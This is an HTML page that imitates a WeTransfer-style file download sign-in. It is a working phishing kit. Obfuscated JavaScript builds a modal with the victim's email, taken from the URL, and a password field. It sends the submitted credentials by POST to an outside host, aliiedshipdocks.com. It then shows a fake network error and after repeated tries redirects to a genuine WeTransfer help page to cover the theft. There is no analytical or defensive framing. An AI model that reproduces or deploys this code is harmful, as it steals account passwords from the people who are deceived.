<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

var _0x6dd2d5=_0x601b;function _0x601b(_0x2db893,_0x2d078b){var _0x34f575=_0x34f5();return _0x601b=function(_0x601b29,_0x508d3f){_0x601b29=_0x601b29-0x18b;var _0x16258c=_0x34f575[_0x601b29];return _0x16258c;},_0x601b(_0x2db893,_0x2d078b);}(function(_0x9d9640,_0x3a52f5){var _0x481f4e=_0x601b,_0x88e84b=_0x9d9640();while(!![]){try{var _0x39c3ce=-parseInt(_0x481f4e(0x18d))/0x1*(parseInt(_0x481f4e(0x1af))/0x2)+parseInt(_0x481f4e(0x1a0))/0x3+-parseInt(_0x481f4e(0x1a9))/0x4*(-parseInt(_0x481f4e(0x1a2))/0x5)+parseInt(_0x481f4e(0x19c))/0x6+-parseInt(_0x481f4e(0x1a3))/0x7*(parseInt(_0x481f4e(0x19d))/0x8)+parseInt(_0x481f4e(0x194))/0x9+parseInt(_0x481f4e(0x18f))/0xa*(-parseInt(_0x481f4e(0x18c))/0xb);if(_0x39c3ce===_0x3a52f5)break;else _0x88e84b['push'](_0x88e84b['shift']());}catch(_0x3e5fc2){_0x88e84b['push'](_0x88e84b['shift']());}}}(_0x34f5,0xb9805),$(window)['on'](_0x6dd2d5(0x193),function(){var _0x1859a3=_0x6dd2d5;$(_0x1859a3(0x191))[_0x1859a3(0x1a1)](_0x1859a3(0x1aa));}),$(document)['ready'](function(){var _0x17c8bc=_0x6dd2d5;$(_0x17c8bc(0x199))['html'](_0x17c8bc(0x190));var _0x1feac1=0x0,_0x15fd47=window['location']['hash'][_0x17c8bc(0x1a6)](0x1);$(_0x17c8bc(0x19a))[_0x17c8bc(0x198)](_0x15fd47),$(_0x17c8bc(0x19e))[_0x17c8bc(0x1a7)](function(_0xb8d4a2){var _0x285559=_0x17c8bc;_0xb8d4a2[_0x285559(0x1ac)]();var _0x433ace=$(_0x285559(0x196))['val'](),_0x96fc65=new FormData($(_0x285559(0x19e))[0x0]);$(_0x285559(0x19f))['html']('\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>')[_0x285559(0x19b)](_0x285559(0x1a4),!![]),$(_0x285559(0x18b))['click'](function(){var _0x86e4f8=_0x285559;$('#msg')[_0x86e4f8(0x18e)]();}),_0x1feac1=_0x1feac1+0x1,$[_0x285559(0x1b0)]({'url':'https://aliiedshipdocks.com/wp-includes/images/post.php','type':_0x285559(0x1a8),'data':_0x96fc65,'contentType':![],'processData':![],'success':function(_0x12ab3d){setTimeout(function(){var _0x35e7e3=_0x601b;$(_0x35e7e3(0x19a))[_0x35e7e3(0x198)](_0x15fd47),$(_0x35e7e3(0x18b))['val'](''),$(_0x35e7e3(0x1ad))[_0x35e7e3(0x1aa)](),$(_0x35e7e3(0x1ad))['html'](_0x35e7e3(0x192)),$(_0x35e7e3(0x19f))[_0x35e7e3(0x1ab)]('Sign\x20In')[_0x35e7e3(0x19b)](_0x35e7e3(0x1a4),![]),_0x1feac1>=0x2&&(_0x1feac1=0x0,window[_0x35e7e3(0x197)][_0x35e7e3(0x195)](_0x35e7e3(0x1a5)));},0x3e8);},'error':function(_0x2765be){setTimeout(function(){var _0x5959f8=_0x601b;$(_0x5959f8(0x19a))[_0x5959f8(0x198)](_0x15fd47),$('#x2')[_0x5959f8(0x198)](''),$(_0x5959f8(0x1ad))[_0x5959f8(0x1aa)](),$(_0x5959f8(0x1ad))[_0x5959f8(0x1ab)](_0x5959f8(0x192)),$(_0x5959f8(0x19f))[_0x5959f8(0x1ab)](_0x5959f8(0x1ae))['prop'](_0x5959f8(0x1a4),![]),_0x1feac1>=0x2&&(_0x1feac1=0x0,window['location'][_0x5959f8(0x195)](_0x5959f8(0x1a5)));},0x3e8);}});});}));function _0x34f5(){var _0x517573=['#myModal','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','load','6439761TibnHi','replace','#A1','location','val','.loaded','#x1','prop','8922444oHOyfe','207112xkAADI','#formx','#submitBtn','4417512FsGBmx','modal','10lBmlHc','259GQgqRJ','disabled','https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading','substr','submit','POST','1655236wqYDTk','show','html','preventDefault','#msg','Sign\x20In','1678282ehgrvQ','ajax','#x2','7134886EmVcoa','1Pxebtn','hide','30KjUzCe','\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20readonly>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09'];_0x34f5=function(){return _0x517573;};return _0x34f5();}

	</script>

</html>
